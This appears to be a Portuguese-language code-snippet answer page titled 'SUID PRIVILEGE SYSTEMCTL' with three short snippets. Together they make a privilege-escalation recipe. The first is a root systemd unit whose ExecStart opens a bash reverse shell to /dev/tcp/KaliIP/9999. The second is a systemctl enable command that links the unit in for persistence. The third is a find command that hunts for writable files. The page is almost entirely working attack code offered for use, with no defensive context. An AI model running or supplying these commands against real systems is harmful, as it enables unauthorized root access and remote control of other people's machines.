“SUID PRIVILEGE SYSTEMCTL” Respostas de código

SUID PRIVILEGE SYSTEMCTL

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
Breakable Bug

SUID PRIVILEGE SYSTEMCTL

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
Breakable Bug

SUID PRIVILEGE SYSTEMCTL

find -type f -maxdepth 2 -writable
Breakable Bug

Respostas semelhantes a “SUID PRIVILEGE SYSTEMCTL”

Perguntas semelhantes a “SUID PRIVILEGE SYSTEMCTL”

Procure respostas de código populares por idioma

Procurar outros idiomas de código